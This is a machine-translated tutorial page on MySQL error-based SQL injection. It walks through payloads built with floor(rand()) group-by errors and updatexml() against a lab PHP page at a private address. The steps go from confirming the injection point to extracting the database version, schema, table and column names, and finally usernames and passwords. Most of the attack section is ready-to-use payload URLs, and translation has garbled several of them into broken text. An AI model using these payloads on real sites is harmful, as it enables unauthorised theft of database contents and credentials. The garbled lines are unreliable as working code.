In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/01 Report--
This article will explain in detail how the error report injection in big data is, and the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
I. correlation function
1. Rand (): generate a random number between 0 and 1, rand (0), randomly generate a random number between 0 and 1, and run it many times to produce the same result.
2. Floor (): round down, floor (rand () * 2), and randomly generate two numbers 0 and 1.
3. Group by: group arrangement
4. Count (*): statistics
5. Concat (): concatenate strings
Second, construct the injection statement through the floor () function.
1. Visit http://192.168.0.104/aiyou/bczr.php?id=2 and return to the normal page.
2. Visit http://192.168.0.104/aiyou/bczr.php?id=2' and return the error page.
3. Construct a closed statement, 192.168.0.104AIYUAYUAYOUBZR.phproomidSecret2'-- +, and the page returns to normal.
4. Get the database version
192.168.0.104According to AaiyouAccord bczr.phproomidcharacters 2 'and (select 1 from (select count (*), concat (floor (rand (0) * 2), 0x23, (version () x from information_schema.tables group by x) a)-- +
5. Get the database name
192.168.0.104According to aiyouAccording to bczr.phpSecretidclassification 2 'and (select 1 from (select count (*), concat (floor (rand (0) * 2), 0x23CoDb (), 0x23) x from information_schema.tables group by x) a)-- +
6. Get other database names (modify red numbers to get different database names)
Http://192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count (*), concat ((select (select (SELECT distinct concat (0x7e SELECT distinct concat (0x7e) FROM information_schema.schemata LIMIT 2) from information_schema.tables limit 0Magi 1), floor (rand (0) * 2) x from information_schema.tables group by x) a)-- +
7. Get the table name (modify the red number to get different table names)
Http://192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count (*), concat) ((select (select (SELECT distinct concat (0x7e) FROM information_schema.tables where table_schema=database () LIMIT 2) from information_schema.tables limit 0Power1), floor (rand (0) * 2) x from information_schema.tables group by x) a)-+
8. To get the field name, you need to specify the table name, which is represented in hexadecimal, and modify the red number to get different fields.
Http://192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count (*), concat ((select (select (SELECT distinct concat (0x7e SELECT distinct concat (0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1) from information_schema.tables limit 0Magi 1), floor (rand (0) * 2) x from information_schema.tables group by x) a)-- +
9. Get the field content
Http://192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count (*), concat) ((select (select (SELECT distinct concat (0x23 (0x23) FROM user limit 0pr 1)) from information_schema.tables limit 0penny 1), floor (rand (0) * 2) x from information_schema.tables group by x) a)-- +
Third, construct the injection statement through updatexml function.
1. Get the database name (get a different database name by modifying the red number)
Http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml (1, (select concat (0x7e, (schema_name), 0x7e) FROM information_schema.schemata limit 5), 1)-- +
2. Get the table name (get a different table name by modifying the red number)
Http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml (1, (select concat (0x7e, (table_name), 0x7e) from information_schema.tables where table_schema='jay' limit 1), 1)-- +
3. Get the field name (get different fields by modifying the red number)
Http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml (1, (select concat (0x7e, (column_name), 0x7e) from information_schema.columns where table_name=0x75736572 limit 1), 1)-- +
4. Get the field content (modify the red number to get different field content)
Http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml (1, (select concat (0x7e, pass,0x7e,name,0x7e) from user limit 1), 1)-- +
About big data in the error injection is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
